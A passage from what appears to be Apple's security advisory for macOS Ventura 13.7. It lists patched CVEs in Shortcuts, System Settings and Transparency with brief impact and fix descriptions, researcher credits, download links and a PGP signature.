Impact: A malicious application may be able to access private  
information  
Description: The issue was addressed with improved checks.  
CVE-2024-44163: Zhongquan Li (@Guluisacat)

Shortcuts  
Available for: macOS Ventura  
Impact: A shortcut may output sensitive user data without consent  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-44158: Kirin (@Pwnrin)

Shortcuts  
Available for: macOS Ventura  
Impact: An app may be able to observe data displayed to the user by  
Shortcuts  
Description: A privacy issue was addressed with improved handling of  
temporary files.  
CVE-2024-40844: Kirin (@Pwnrin) and luckyu (@uuulucky) of NorthSea

System Settings  
Available for: macOS Ventura  
Impact: An app may be able to access user-sensitive data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2024-44166: Kirin (@Pwnrin) and LFY (@secsys) from Fudan University

System Settings  
Available for: macOS Ventura  
Impact: An app may be able to read arbitrary files  
Description: A path handling issue was addressed with improved  
validation.  
CVE-2024-44190: Rodolphe BRUNETTI (@eisw0lf)

Transparency  
Available for: macOS Ventura  
Impact: An app may be able to access user-sensitive data  
Description: A permissions issue was addressed with additional  
restrictions.  
CVE-2024-44184: Bohdan Stasiuk (@Bohdan_Stasiuk)

Additional recognition

Airport  
We would like to acknowledge David Dudok de Wit for their assistance.

macOS Ventura 13.7 may be obtained from the Mac App Store or Apple's  
Software Downloads web site: https://support.apple.com/downloads/

All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/100100.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmboy2sACgkQX+5d1TXa  
IvoOmhAA1kPpqqhEBRbskSU4pFIfX+JY/MyIrnI+6pNgMk3CLhQ5SSx0aFS2tg/c  
We70hoiTA8eWMvRkYr8KYNriNstqCivg7iq84Gv4/ycJ9Hx4Zwj6pZh5If1H8y+Q  
3NVsvLgnmvnAb6W7MvpXtgma47vA5xRe2oefCNe6QbcC2qnQ2xaspBZtH805IkAi  
WznXdr7UXmjJyfjlgp2FifyiLYQoPXPGFOLKkBURDCxaH4SJidgvzxerU+B+1ju9  
dqW29eQwTjG+qhXncTuxfUSuQ5s7g5XfVqfvcTQihUk+ZjWaMYOaUT2UYlAgDfg5  
Mq35kP/Hvh8zmf+Ryufl3D+qfKpyVUUJUKu+kEMbOIoIMkCzM4F0G30czaKiGCA+  
tJCEtsY/oxcbEcy8DLQbesPCv5Hf1Gv2fMkP3p/6CAYqXQ1mXQF0Vm2erKRqS+yD  
N2+M+r/GFzvK4i9bf6j10kDgv9PRxPs+pH9zuU85cwhT+jZzr2dkvTC9p+mI+5CJ  
AZ7ZMgTLbXDw2M4d4e6mEV3XbJ5ebNqQv9t0Hfbg3pf8YVEeAO0casIPopLK6fqi  
uS7gn/3PL9C1HS2gqlekYuwiP0DSleKk9qCDUVVfmAAxTA1vHKvtvlRBO0ykN7HI  
NmX+8AuFy8jnZRmZWXIbav1/EdWYg7e5SLCD+pemYLcMYSoSNXg=  
=YxVI  
-----END PGP SIGNATURE-----

Tag

#mac